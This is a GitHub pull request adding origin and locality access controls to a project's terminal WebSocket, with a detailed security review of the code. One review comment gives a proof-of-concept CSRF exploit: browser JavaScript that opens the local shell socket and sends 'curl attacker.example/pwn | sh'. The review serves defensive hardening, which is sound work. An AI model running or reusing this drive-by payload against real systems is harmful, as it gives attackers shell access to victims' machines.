### PR TITLE
feat(api): add terminal websocket access controls and documentation (Terminal Phase 2)

### PR DESCRIPTION
**Pull request by leszek3737**
## Type
- [x] Feature (Rust)
- [x] Documentation / Translation

## Summary

Adds config-driven access control for the terminal WebSocket, including terminal enablement, remote-access gating, browser origin validation, dashboard support, and documentation for the new configuration surface.
This PR also improves terminal UX in the dashboard, adds validation warnings for risky config combinations, and documents terminal access control in both the default config template and MDX docs.

## Changes

- add `terminal` configuration with:
  - `enabled`
  - `allow_remote`
  - `allowed_origins`
- harden terminal WebSocket access control with:
  - connection locality detection
  - browser `Origin` validation
  - remote/local unauthenticated access gating
  - auth-aware handling for remote access
- support wildcard `allowed_origins = ["*"]` semantics in origin validation
- improve diagnostics for malformed configured allowed origins
- add config validation warnings for risky terminal access settings
- expose terminal availability through API status responses for dashboard use
- update the dashboard to:
  - avoid duplicate status fetches
  - respect terminal availability
  - avoid premature terminal WebSocket connection attempts
  - show terminal root-execution warning state from backend metadata
- reduce terminal startup metadata leakage by sending only the shell basename
- add and expand tests for terminal origin validation and access-control policy
- document terminal access control in:
  - `crates/librefang-cli/templates/init_default_config.toml`
  - `docs/src/app/configuration/security/page.mdx`
  - `docs/src/app/zh/configuration/security/page.mdx`

## Attribution
- [x] This PR preserves author attribution for any adapted prior work (`Co-authored-by`, commit preservation, or explicit credit in the PR body)

## Testing
- [x] `cargo clippy --workspace --all-targets -- -D warnings` passes
- [x] `cargo test --workspace` passes
- [x] Live integration tested (if applicable)

## Security
- [x] No new unsafe code
- [x] No secrets or API keys in diff
- [x] User input validated at boundaries

### CODE REVIEW

File: crates/librefang-api/src/ws.rs [hunk 1]
```diff
@@ -137,6 +138,135 @@ pub fn ws_auth_token(headers: &HeaderMap, uri: &Uri) -> Option<String> {
...
+
+    let origin_port = if origin_scheme == "https" {
+        parsed.port().unwrap_or(443)
+    } else {
+        parsed.port().unwrap_or(80)
+    };
+
+    let normalized_origin_host = normalize_origin_host(origin_host);
+
+    if origin_port == listen_port && normalized_origin_host == "localhost" {
```
Comment (houko) [inline crates/librefang-api/src/ws.rs]: **Blocker — breaking change for direct-IP access.** The auto-allow here only fires for `localhost`. But the default `api_listen = "0.0.0.0:4545"` means plenty of real deployments serve the dashboard over LAN IP or an internal hostname. After this PR those requests will carry `Origin: http://192.168.x.x:4545`, fail the `normalized_origin_host == "localhost"` check, hit the `allowed_origins` loop with an empty list, and get rejected with a 403 — the UI just shows a failed WebSocket, and the only trace is a server-side `warn!`.

Suggestion: when `locality.is_loopback && !locality.is_proxied` (true same-host client), skip origin validation entirely — that matches the existing `local_bypass` semantics and keeps the upgrade path clean. Alternatively, treat any origin whose port equals `listen_port` as same-origin regardless of host, since the daemon can't know what hostname the user typed in their browser.

File: crates/librefang-api/src/ws.rs [hunk 2]
```diff
@@ -137,6 +138,135 @@ pub fn ws_auth_token(headers: &HeaderMap, uri: &Uri) -> Option<String> {
...
+
+    let proxy_headers = [
+        "x-forwarded-for",
+        "x-real-ip",
+        "cf-connecting-ip",
+        "fly-client-ip",
+        "true-client-ip",
+    ];
+
+    let is_proxied = proxy_headers.iter().any(|h| headers.contains_key(*h));
```
Comment (houko) [inline crates/librefang-api/src/ws.rs:251]: **Blocker — reverse-proxy local-bypass footgun.** `is_proxied` is `true` only if one of the recognized headers is present. If an operator deploys nginx in front of the daemon and forgets `proxy_set_header X-Forwarded-For $remote_addr;` (which is not the default on many distros), the daemon sees socket IP `127.0.0.1` with **zero** proxy headers, so `is_local() = true`. Combined with the `local_bypass` branch in `terminal.rs`, a remote user reaching the nginx frontend gets an unauthenticated shell.

This is realistic: self-hosted users frequently skip `api_key`/dashboard credentials because "it's behind nginx." Please either (1) add an explicit `trust_proxy_headers` config flag that must be opted into before XFF is considered, and keep `local_bypass` strictly for loopback-only, or (2) refuse `local_bypass` whenever the daemon has no auth at all AND emit an `ERROR`-level startup log if terminal is enabled with zero auth (`valid_tokens.is_empty() && user_api_keys.is_empty() && !dashboard_auth`). Documentation alone is not enough for this class of footgun.

File: crates/librefang-api/src/ws.rs [hunk 3]
```diff
@@ -137,6 +138,135 @@ pub fn ws_auth_token(headers: &HeaderMap, uri: &Uri) -> Option<String> {
...
+            return Ok(());
+        }
+    }
+
+    Err(format!("Origin {origin} not in allowed list"))
+}
+
+fn normalize_origin_host(host: &str) -> &str {
+    match host {
+        "localhost" | "127.0.0.1" | "::1" | "[::1]" => "localhost",
```
Comment (houko) [inline crates/librefang-api/src/ws.rs:217]: Nit: the `"[::1]"` arm is dead code. `url::Url::host_str()` returns the unbracketed form (`"::1"`) for IPv6 hosts — the bracketed variant never reaches this `match`. Drop it, or add a test that proves me wrong.

File: crates/librefang-api/src/ws.rs [hunk 4]
```diff
@@ -137,6 +138,135 @@ pub fn ws_auth_token(headers: &HeaderMap, uri: &Uri) -> Option<String> {
...
+
+// ---------------------------------------------------------------------------
+// Connection Locality Detection
+// ---------------------------------------------------------------------------
+
+pub struct ConnectionLocality {
+    pub source_ip: IpAddr,
+    pub is_loopback: bool,
+    pub is_proxied: bool,
+    pub forwarded_ip: Option<IpAddr>,
```
Comment (houko) [inline crates/librefang-api/src/ws.rs:230]: `forwarded_ip` is computed here but nothing in the PR reads it. Either drop the field or log it from the terminal handler (it would genuinely help when debugging a reverse-proxy misconfig). Right now it's dead state that a future reader has to grep to understand.

File: crates/librefang-api/src/routes/terminal.rs [hunk 5]
```diff
@@ -129,50 +141,134 @@ pub async fn terminal_ws(
...
+        return axum::http::StatusCode::FORBIDDEN.into_response();
+    }
 
-    // No token at all → immediate reject.
-    let token_str = match provided_token.as_deref() {
-        Some(t) => t,
-        None => {
-            warn!("Terminal WebSocket rejected — no auth token provided");
-            return axum::http::StatusCode::UNAUTHORIZED.into_response();
+    let listen_port = cfg
```
Comment (houko) [inline crates/librefang-api/src/routes/terminal.rs]: Silent fallback to port 4545 on a parse failure is a footgun. If someone sets `api_listen = "[::]:8080"` and there's any parse hiccup (or a future refactor changes the format), `listen_port` silently becomes 4545, then origin validation rejects every request to the real port 8080, and the user gets a 403 wall with no idea why.

Prefer either: (a) parse `api_listen` once at config load time and store `listen_port: u16` on `KernelConfig`, or (b) `tracing::error!` and refuse to accept any origin validation if parsing fails, so the misconfig is loud.

While you're in here: also consider pre-parsing `cfg.terminal.allowed_origins` at config load time and caching `(scheme, host, port)` tuples. Right now every WS upgrade re-parses every entry as a `url::Url`, which is not free on a hot path.

File: crates/librefang-api/src/routes/terminal.rs [hunk 6]
```diff
@@ -578,3 +676,48 @@ mod tests {
         let _app = router();
     }
 }
+
+// ---------------------------------------------------------------------------
+// WebSocket auth policy unit tests
+// ---------------------------------------------------------------------------
+
+#[cfg(test)]
+mod terminal_ws_auth_tests {
```
Comment (houko) [inline crates/librefang-api/src/routes/terminal.rs:840]: These three "terminal policy" tests don't actually exercise the terminal handler or its auth decision tree — they call `validate_ws_origin` (already covered by the tests in `ws.rs`) and then AND the result with a local `allow_remote` boolean. Each assertion reduces to `true && true`, so they pass unconditionally regardless of any future change to `terminal_ws`.

Real value would be integration-shaped tests that build a mock `AppState`, call `terminal_ws` with different combinations of `(enabled, token, locality, allow_remote, origin)`, and assert the returned `StatusCode`. Right now the hardest-to-reason-about branch in the PR (the `auth_configured` fall-through in `terminal.rs:190-262`) has zero direct test coverage. Please either delete these as noise or replace them with real branch coverage.

File: crates/librefang-cli/templates/init_default_config.toml [hunk 7]
```diff
@@ -72,6 +72,18 @@ mode = "deny"                   # deny | allowlist | full
 timeout_secs = 30
 max_output_bytes = 102400       # 100 KB
 
+# ── Terminal Access Control ──────────────────────────────────
+# Interactive terminal is enabled by default, but unauthenticated access is
+# local-only unless you explicitly allow remote use below.
+# [terminal]
+# enabled = true
+# allow_remote = false           # false = local-only without auth
```
Comment (houko) [inline crates/librefang-cli/templates/init_default_config.toml]: Comment is misleading. `allow_remote = false` does not mean "local-only without auth" — it means "local-only *when* no auth is configured." With API keys or dashboard credentials configured, remote clients can still authenticate and connect regardless of this flag. The docs/MDX get the semantics right; please keep the template consistent so operators reading just the config file aren't misled into thinking this is a network-level gate.

**Review by houko — CHANGES_REQUESTED** [review]
Direction is right — hardening the terminal WebSocket is overdue — but there are two substantive issues that need to land before merge, plus a handful of should-fix items. Leaving line-level comments on the specific spots; summary of the two blockers below.

**Blocker 1 — silent breaking change for direct-IP / LAN access.** `validate_ws_origin` only auto-allows `localhost` at `listen_port`. The daemon listens on `0.0.0.0:4545` by default, so anyone accessing the dashboard over LAN (`http://192.168.x.x:4545/`) or an internal hostname will start getting 403s after upgrading, with only a server-side `warn!` explaining why. There's no release-note / upgrade story for this. Please either: (a) skip origin validation when the connection is true loopback (`is_loopback && !is_proxied`), which matches the existing `local_bypass` semantics; (b) treat any `Origin` whose port matches `listen_port` as same-origin; or (c) make this a loud, documented migration with a fallback config knob.

**Blocker 2 — reverse-proxy + no-auth → local bypass.** `detect_connection_locality` decides `is_proxied` purely by the *presence* of `X-Forwarded-For`/`X-Real-IP`/etc. If an operator runs nginx in front of the daemon but forgets `proxy_set_header X-Forwarded-For $remote_addr;` (or any of the other recognized headers), the nginx → daemon hop is `127.0.0.1` with no proxy headers, so `is_local() = true`, and the `local_bypass` branch hands the reverse-proxied remote user an unauthenticated shell. Combined with the fact that many self-hosted setups skip `api_key` / dashboard credentials, this is a realistic path to unauthenticated RCE. Mitigation options: add a `trust_proxy_headers` flag and refuse local bypass unless explicitly opted-in; require `auth_configured` *or* `allow_remote == false` *and* loopback with zero proxy headers AND log a loud `warn!` at startup if terminal is enabled without any auth configured (`valid_tokens.is_empty() && user_api_keys.is_empty() && !dashboard_auth`). At minimum the README/docs need a large banner that says 'do not enable the terminal behind a reverse proxy without configuring auth'.

Other issues are left inline: `api_listen` silent fallback, template comment misrepresenting `allow_remote` semantics, hot-path URL parsing, tautological tests in `terminal_ws_auth_tests`, dead `forwarded_ip` field, dead `[::1]` branch, and an observability nit that `local_bypass` should log at `warn!` not `info!`.

**Comment by leszek3737** [comment]
Thanks for the PR review, changes made.

File: crates/librefang-api/src/ws.rs [hunk 8]
```diff
@@ -137,6 +138,149 @@ pub fn ws_auth_token(headers: &HeaderMap, uri: &Uri) -> Option<String> {
...
+
+    let normalized_origin_host = normalize_origin_host(origin_host);
+
+    if origin_port == listen_port && normalized_origin_host == "localhost" {
+        return Ok(());
+    }
+
+    // Allow any origin whose port matches listen_port (covers LAN IP,
+    // hostname, etc. — e.g. http://192.168.1.5:4545 when listening on 4545).
+    if origin_port == listen_port {
```
Comment (houko) [inline crates/librefang-api/src/ws.rs]: **CSRF bypass via port-only matching.** This rule accepts any origin whose port number matches `listen_port`, regardless of host. The test `validate_ws_origin_arbitrary_host_same_port_allowed` (L1674) codifies this as intentional, but combined with `local_bypass` it means any webpage an attacker serves on the default port **4545** can open a WebSocket to the victim's local daemon and pass Origin validation.

Concrete exploit:

1. Victim runs `librefang` with defaults: `api_listen=127.0.0.1:4545`, `terminal.enabled=true`, no auth configured.
2. Victim visits `http://attacker.example:4545/` (attacker picks port 4545 to match).
3. JS on the page runs:
   ```js
   const ws = new WebSocket('ws://localhost:4545/api/terminal/ws');
   ws.onopen = () => ws.send(JSON.stringify({type:'input', data:'curl attacker.example/pwn | sh\n'}));
   ```
4. Browser sends `Origin: http://attacker.example:4545`, `origin_port = 4545`, matches `listen_port = 4545` → **Origin check passes**.
5. Source IP is `127.0.0.1` (browser connects to loopback), no proxy headers → `is_local() == true` → `local_bypass` → **unauthenticated shell**.

The fix is to tighten the 'same port' short-circuit. Options, roughly in order of preference:

- **Compare against the request's `Host` header instead of `listen_port`.** Standard same-origin check: `origin.host == host_header.host && origin.port == host_header.port`.
- **Require exact-match against `allowed_origins`** for anything non-localhost. Operators who access via `http://192.168.1.5:4545` add that one entry.
- At minimum, restrict the shortcut to origin hosts that are **IP literals of the machine's own interfaces**, so an external hostname at the same port is rejected.

The test at L1674 should then be inverted (arbitrary host on same port should be **rejected**).

File: crates/librefang-api/src/ws.rs [hunk 9]
```diff
@@ -137,6 +138,149 @@ pub fn ws_auth_token(headers: &HeaderMap, uri: &Uri) -> Option<String> {
...
+        return Ok(());
+    }
+
+    // Wildcard "*" means allow all origins
+    if extra_origins.iter().any(|o| o == "*") {
```
Comment (houko) [inline crates/librefang-api/src/ws.rs]: **Wildcard `["*"]` disables CSRF protection.** `validate_ws_origin_wildcard_allows_any_http_origin` explicitly accepts `http://evil.example:9999`. If an operator sets `allowed_origins = ["*"]` — a reasonable-sounding opt-in for 'I want to embed the dashboard on arbitrary subdomains' — every webpage on the internet can now open a WebSocket to their daemon and run shell commands.

Two changes I'd want:

1. **Gate the wildcard on `allow_remote = true`.** `allowed_origins = ["*"]` without `allow_remote` is incoherent. Refuse the combo at config load with a clear error.
2. **Document the CSRF tradeoff** in the default config template and the security MDX. Right now `init_default_config.toml` says `allowed_origins` is for 'additional WebSocket origins' without mentioning that `["*"]` is equivalent to turning off browser isolation.

Separately: the wildcard path in `validate_ws_origin_wildcard_rejects_non_http_scheme` is protected only because the `http`/`https` scheme check at L159 runs **before** the wildcard match at L182. Correct today but fragile — a comment explaining the ordering dependency would help.

File: crates/librefang-api/src/routes/terminal.rs [hunk 10]
```diff
@@ -129,49 +141,158 @@ pub async fn terminal_ws(
...
+        } else if auth_configured || cfg.terminal.allow_remote {
+            warn!(
+                ip = %locality.source_ip,
+                proxied = locality.is_proxied,
+                reason = "invalid_token",
+                "Terminal WebSocket rejected — invalid auth token"
+            );
+            return axum::http::StatusCode::UNAUTHORIZED.into_response();
+        } else if locality.is_local() {
+            if trust_proxy_headers {
```
Comment (houko) [inline crates/librefang-api/src/routes/terminal.rs]: **`trust_proxy_headers` doesn't gate anything — it's only logged.** The field name and docs (`types.rs:5676-5680`) promise 'X-Forwarded-For / X-Real-IP headers are trusted for locality detection', but in the actual flow it's only consulted here and at L260 to emit a `warn!` — the connection still proceeds to `auth_method = "local_bypass"` on the next line.

That means:

- Operator sets `trust_proxy_headers = true` because they front librefang with nginx.
- nginx is misconfigured and forgets to inject `X-Forwarded-For`.
- A connection from `127.0.0.1` (nginx's loopback forward) hits `is_loopback=true, is_proxied=false`, `is_local() = true`.
- The warning fires to the log.
- **local_bypass is still granted.**

The operator's mental model is 'I told the system to trust proxy headers, so anything from the proxy is authoritative and bare local connections are suspicious'. The code's actual behavior is 'I'll just log and allow'.

Pick one:

- **Wire it to actually deny**: when `trust_proxy_headers=true` and `is_loopback=true && !is_proxied`, treat the connection as non-local (`is_local() = false`), forcing it down the auth path.
- **Or remove the field and the claim**. Drop `trust_proxy_headers` from the config and the docs.

A config flag whose presence has no effect on the actual decision is a footgun.

File: crates/librefang-types/src/config/types.rs [hunk 11]
```diff
@@ -5635,6 +5652,45 @@ impl Default for LinkedInConfig {
...
+    /// locality detection. Must be explicitly enabled when running behind
+    /// a reverse proxy. Default: false.
+    #[serde(default)]
+    pub trust_proxy_headers: bool,
+}
+
+impl Default for TerminalConfig {
+    fn default() -> Self {
+        Self {
+            enabled: true,
```
Comment (houko) [inline crates/librefang-types/src/config/types.rs:5858]: **Fail-safe default: `enabled` should default to `false`.** A shell endpoint is high-privilege — running the daemon on a fresh config should not silently enable it. Today:

- Existing deployments upgrading to this version will have `terminal.enabled = true` applied automatically because there's no field in their `config.toml`.
- Fresh installs get a terminal WS exposed on `127.0.0.1:4545` out of the box.
- The `init_default_config.toml` template added in this PR documents the setting, but by then the default has already been applied for anyone not running from a fresh template.

Flipping this to `enabled: false` and requiring the operator to explicitly opt in is the standard pattern for features with this blast radius.

File: crates/librefang-types/src/config/validation.rs [hunk 12]
```diff
@@ -91,6 +91,7 @@ impl KernelConfig {
             "max_concurrent_bg_llm",
             "max_agent_call_depth",
             "max_request_body_bytes",
+            "terminal",
```
Comment (houko) [inline crates/librefang-types/src/config/validation.rs:94]: **Missing actual validation.** The PR body claims 'add config validation warnings for risky terminal access settings', but this file only adds `"terminal"` to a known-fields allowlist — no logic that inspects the new struct at all. The runtime warnings at `routes/terminal.rs:162-164` and `235-240` are a poor substitute: they fire on the **first WebSocket connection**, which a monitoring-free operator can easily miss.

Config load / `validate()` should flag at least:

1. `terminal.enabled = true && terminal.allow_remote = true && auth not configured` — hard error unless some explicit `insecure_mode` is set.
2. `terminal.enabled = true && terminal.allowed_origins.contains("*")` — require `allow_remote = true`, emit a loud warning.
3. `terminal.trust_proxy_headers = true && api_listen.starts_with("127.")` — the flag is meaningless on loopback-only listens.
4. Each entry in `allowed_origins` that doesn't parse as a valid http(s) URL — reject with the offending value in the error, not at request-time on L188 of `ws.rs`.

**Review by houko — CHANGES_REQUESTED** [review]
Thanks for the detailed work — the structure (locality detection + Origin validation + layered auth + rate limiting) is the right shape, and I appreciate the test coverage for `validate_ws_origin` and `detect_connection_locality`. Local build clean, 280 unit tests pass.

That said, I found **three security issues** in the access-control logic that I think have to be addressed before this lands. None are catastrophic alone, but the terminal WebSocket executes arbitrary shell commands — the threshold is higher here than for normal endpoints. I'll detail each inline; summary:

1. **`origin_port == listen_port` with no host check is a CSRF bypass** (`ws.rs:177`, codified by `validate_ws_origin_arbitrary_host_same_port_allowed`). Any webpage served on the same port as the daemon can open a WebSocket to the local daemon and pass Origin validation. Combined with `local_bypass` this is unauthenticated shell access via a drive-by visit to an attacker's page.
2. **`allowed_origins = ["*"]`** effectively disables Origin validation and should at minimum be gated on `allow_remote` plus loud documentation. In its current form any browser on the internet can hit the WS if it knows the URL.
3. **`trust_proxy_headers` doesn't actually gate anything** (`routes/terminal.rs:234,260`). The field is read and it emits a warning when the locality decision looks suspicious, but local_bypass is still granted. The name promises enforcement the code doesn't deliver — either wire it into the deny decision or rename and narrow the claim.

## Should-fix

4. **Default `enabled: true`** (`types.rs:5686`). A shell endpoint should opt-in, not opt-out. Upgrading an existing install silently turns on a new high-privilege endpoint.
5. **No actual config validation for risky combos** — the PR body claims 'add config validation warnings for risky terminal access settings' but `validation.rs` only adds `"terminal"` to an allowlist string array. There is no logic that flags e.g. `terminal.enabled=true + terminal.allow_remote=true + no auth configured`, or malformed `allowed_origins` entries. The runtime `warn!` at `routes/terminal.rs:163` is too late — it fires on first connection, not on config load.
6. **`allowed_origins` entries are re-parsed on every WS connection** (`ws.rs:188`). A malformed entry also produces a confusing user-facing error ('Origin ... not in allowed list' instead of 'your allowed_origins has a typo'). Validate at config load and fail-fast with a clear diagnostic.

## Minor

7. **`ServerMessage::Display` UTF-8 boundary panic** at `routes/terminal.rs:109`: `format!("{}...", &data[..32])` slices by raw byte index and will panic if the first 32 bytes end inside a multibyte UTF-8 character — same bug class as #2285. Terminal output commonly contains non-ASCII (prompts with ✓/✗, CJK filenames, emoji, accented locales) so this is reachable in practice. Low severity (Display/debug only, not wire data) but trivial to fix with `data.chars().take(32).collect::<String>()`. Not in the PR's own diff hunk, hence not commented inline — but while you're hardening this area it's adjacent enough to sweep up.
8. `KernelConfig::listen_port()` re-parses `api_listen` on every call. Not hot, but invoked per WS connection — cache it.
9. **No integration test covering the full `terminal_ws` decision tree.** `validate_ws_origin` and `detect_connection_locality` have good unit tests, but the big `if/else if` chain in `terminal_ws` that threads locality × token presence × auth_configured × allow_remote is where the real security decisions happen, and it's currently unverified end-to-end. Given the sensitivity I'd add at least 6 integration tests: local+no-auth+no-token → bypass; local+auth+valid-token → api; local+auth+missing-token → 401; remote+!allow_remote+no-token → 403; remote+allow_remote+no-auth-configured → remote_open; origin-mismatch+!allow_remote → 403.

## Scope observation

The PR bundles Rust security hardening + TypeScript dashboard tweaks + two language docs pages. The Rust bits are what need careful review; the dashboard + docs are lower risk but add review overhead. Not blocking, but a Phase 3 PR could split them.

Happy to re-review once 1–3 are addressed. I think 4–6 are also worth doing in this PR since they're small and directly adjacent to the access-control code, but I won't block on them if you'd rather handle them as a follow-up.

**Review by houko — COMMENTED** [review]
Thanks for the substantial security work here — origin validation, locality detection, locality-aware auth chain, and constant-time token comparison are all solid additions. Test coverage is good (30+ cases spanning origin/locality edge cases). A few things to address before merge:

## 🔴 Blocker: `terminal.enabled` default mismatches the documentation

The docs claim it defaults to `true`:

> `enabled` | bool | `true` | Master switch for the terminal feature...

but the implementation derives `Default` on `TerminalConfig` with a plain `pub enabled: bool`, which makes the default `false`:

```rust
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
#[serde(default)]
pub struct TerminalConfig {
    #[serde(default)]
    pub enabled: bool,   // <-- bool::default() == false
    ...
}
```

Combined with:

1. `init_default_config.toml` does not set `enabled` (only commented-out `allow_remote` / `trust_proxy_headers`)
2. `validate()` only runs the new checks when `terminal.enabled == true`, so misconfiguration is silent

…this means **every existing user who upgrades will silently lose terminal access** with a generic 403, and **every fresh `librefang init` install will ship with the terminal feature dead** until the user manually adds `[terminal] enabled = true` to their config. There's no warn-level log, no migration note, and the docs/code disagreement makes it look unintended.

Two ways to fix:

**Option A (recommended):** make the implementation match the docs — default `enabled` to `true`.

```rust
fn default_terminal_enabled() -> bool { true }

#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(default)]
pub struct TerminalConfig {
    #[serde(default = \"default_terminal_enabled\")]
    pub enabled: bool,
    #[serde(default)]
    pub allowed_origins: Vec<String>,
    #[serde(default)]
    pub allow_remote: bool,
    #[serde(default)]
    pub trust_proxy_headers: bool,
}

impl Default for TerminalConfig {
    fn default() -> Self {
        Self {
            enabled: true,
            allowed_origins: Vec::new(),
            allow_remote: false,
            trust_proxy_headers: false,
        }
    }
}
```

This keeps existing users working, ships the new origin/locality protections by default, and matches the documented behaviour.

**Option B:** keep the `false` default and treat this as a deliberate breaking change — but then the PR title/description should call it out, the `init_default_config.toml` template should set `enabled = true` (or at least include it as a non-commented field), and the docs default column should change to `false`.

I'd strongly prefer Option A — \"security hardening\" shouldn't break the feature for everyone on upgrade.

## 🟡 Doc gap: `trust_proxy_headers` is missing from the field table

`trust_proxy_headers` exists in the code, has non-trivial behaviour (rejects loopback connections without proxy headers when `trust_proxy_headers` is true), and is mentioned in the init template comment, but it's **not in the security.mdx field table** — neither the English nor the Chinese version. Worth adding a row, since the interaction with locality detection is subtle (a loopback-direct connection gets rejected with this on, which will surprise people debugging behind a reverse proxy).

## 🟢 Minor: dead branch in `normalize_origin_host`

```rust
fn normalize_origin_host(host: &str) -> &str {
    match host {
        \"localhost\" | \"127.0.0.1\" | \"::1\" | \"[::1]\" => \"localhost\",
        _ => host,
    }
}
```

`Url::parse(\"http://[::1]:4545\").host_str()` returns `\"::1\"` (no brackets), so the `\"[::1]\"` arm is unreachable. The IPv6 loopback test passes via the `\"::1\"` arm. Cosmetic — can be deleted.

## 🟢 Minor: `listen_port()` silently falls back to 4545

```rust
pub fn listen_port(&self) -> u16 {
    self.api_listen.rsplit(':').next().and_then(|s| s.parse::<u16>().ok()).unwrap_or(4545)
}
```

If `api_listen` is malformed (or set to something like `\"unix:/var/run/librefang.sock\"` in the future), this silently returns 4545 and the origin port check uses the wrong value. Not a security hole today, but a `tracing::warn!` on the fallback path would help future debugging.

## 🟢 Test layout (purely cosmetic)

There are two test modules in `routes/terminal.rs` (`mod tests` and `mod terminal_ws_auth_tests`) with overlapping coverage on `validate_ws_origin` wildcard semantics. They could be consolidated, but it doesn't affect correctness.

## What's done well

- **CSRF defence via Origin check is the core win** — without this, an attacker-controlled page in a victim's browser could open a WebSocket to `ws://localhost:4545/api/terminal/ws` and run shell commands. The new same-port-loopback auto-allow plus explicit `allowed_origins` for everything else is the right trade-off.
- **Wildcard `\"*\"` is gated on `allow_remote`** — preventing accidental enablement of remote unauthenticated access just by listing `\"*\"`.
- **Constant-time token comparison** via `subtle::ConstantTimeEq` for API keys.
- **`is_running_as_root()` surfaced through the `Started` server message** so the dashboard can warn the operator — nice UX touch.
- **`local_bypass` clearly named and audit-logged** at warn level — anyone reviewing logs will spot when the unauthenticated local path is taken.
- **`trust_proxy_headers` rejects loopback-direct when proxy is configured** — correct hardening for the reverse-proxy threat model, even though it needs better docs.
- **30+ unit tests** covering the security-critical primitives.

Once the `enabled` default is fixed and `trust_proxy_headers` is documented, this is a clear approve from me. CI on Ubuntu / Quality was still pending when I checked — they should be wrapped before merge.

**Comment by leszek3737** [comment]
## Why `[::1]` was kept in `normalize_origin_host`

Noted that `Url::host_str()` returns `"::1"` (without brackets) for `http://[::1]:4545`, making the `"[::1]"` match arm unreachable.

  In practice with **url v2.5.8** (pinned in our `Cargo.lock`), `host_str()` returns `"[::1]"` **with brackets** for IPv6 loopback origins. This was confirmed empirically — removing the arm caused
  `validate_ws_origin_ipv6_loopback_valid` to fail:

  ```
  assertion failed: result.is_ok()
  ```

  The behavior may differ across url crate versions. Keeping both `"::1"` and `"[::1]"` is defensive and costs nothing — an unreachable match arm in some versions, a necessary one in others. Either way
   it's a no-op at runtime.

**Comment by houko** [comment]
## Review

**Verdict: nits** — access control is sound, defaults are safe, no bypasses found. A few items to address before merge.

### Verified safe
- LAN attacker forging `Origin: localhost` → `peer_addr` non-loopback → 403 (`terminal.rs:541-548`)
- Loopback peer forging `X-Forwarded-For` → demoted, not escalated
- `file://` / `null` origin → scheme check at `ws.rs:840` rejects before wildcard
- Wildcard `"*"` only effective with `allow_remote=true` (`ws.rs:862`)
- Default config: `enabled=true, allow_remote=false, allowed_origins=[], trust_proxy_headers=false` — local-only ✓
- Existing TOMLs without `[terminal]` get the safe Default via `#[serde(default)]` — no lockout

### Should fix before merge

1. **Policy inconsistency** (`terminal.rs:489-578`): with `auth_configured=false` + `allow_remote=true`, sending **no token** hits `remote_open` and succeeds, but sending a **bogus token** returns 401. Same client intent, opposite outcomes — foot-gun. Pick one: treat no-token-while-open as success uniformly, or force auth once `allow_remote=true`. Adding an enum + single match over the policy matrix would also make this testable.

2. **PR claim doesn't match code**: PR description says "reduce terminal startup metadata leakage by sending only the shell basename", but `terminal.rs:609` forwards `shell_name` as-is. Either the basename trimming got lost in a rebase, or the description needs updating.

3. **`trust_proxy_headers` is misnamed**: the implementation only uses it to *reject* bare-loopback when no proxy header is present (`terminal.rs:532-539`, `558-566`). The name suggests the opposite. Rename to `require_proxy_headers` or document explicitly.

4. **`allow_remote=true` + no auth** only emits `tracing::warn!` (`validation.rs:1360-1368`); does not refuse to boot. Given this is "unauthenticated shell exposed to the network", at minimum log at `error!` on every accepted connection, ideally hard-refuse unless an explicit override is set.

5. **Case-sensitive host comparison** (`ws.rs:881`) — RFC 3986 makes host case-insensitive. `http://My.Domain.com` won't match `my.domain.com`. Use `eq_ignore_ascii_case`.

6. **`listen_port()` silent fallback to 4545** (`types.rs:1254-1260`): if config is malformed and the daemon listens on a different port, Origin validation will trust `localhost:4545` while the real port differs — breaks the CSRF check. Make it `Option<u16>` and fail closed in `validate_ws_origin`.

### Test coverage gap
Unit tests for the origin/locality primitives are solid (`ws.rs:981-1197`). But the actual decision chain in `terminal_ws` (`terminal.rs:484-578`) — the tangled if/else that produced the policy inconsistency above — has zero test coverage. Given (1), this is the test that most needs to exist. An integration test against a real axum server covering `(local|remote) × (auth|no-auth) × (token|bogus|none)` would lock the policy matrix down.

### Nits
- `libc` pulled in unix-only just for `geteuid()`; `rustix::process::geteuid()` is already in the workspace tree.
- Dashboard race in `TerminalPage.tsx`: `terminalEnabled` starts `null`; if the `/api/status` fetch fails, it stays `null` forever and the page shows infinite loading. Add an error path.
- `let auth_method: &'static str;` with every branch assigning is un-idiomatic — an enum makes the policy matrix obvious.
- Trailing newline stripped from both security `page.mdx` files — unrelated churn, harmless.

### Out of scope but worth a follow-up
- `agent_ws` and other WS endpoints did **not** get the same Origin/locality hardening. Attack surface is now inconsistent across WS endpoints — worth a follow-up issue.
- `server.rs` route registration doesn't honor `enabled=false` at router-construction time (the path is still advertised, runtime check returns 403). Early 404 would be cleaner.

Nothing here is a hard blocker on the access-control crypto; the policy inconsistency in (1) is the only one I'd want fixed before this lands. The shell-basename mismatch in (2) is a 30-second fix or a description update. Nice work overall.

**Comment by leszek3737** [comment]
done :D

**Review by houko — APPROVED** [review]
LGTM
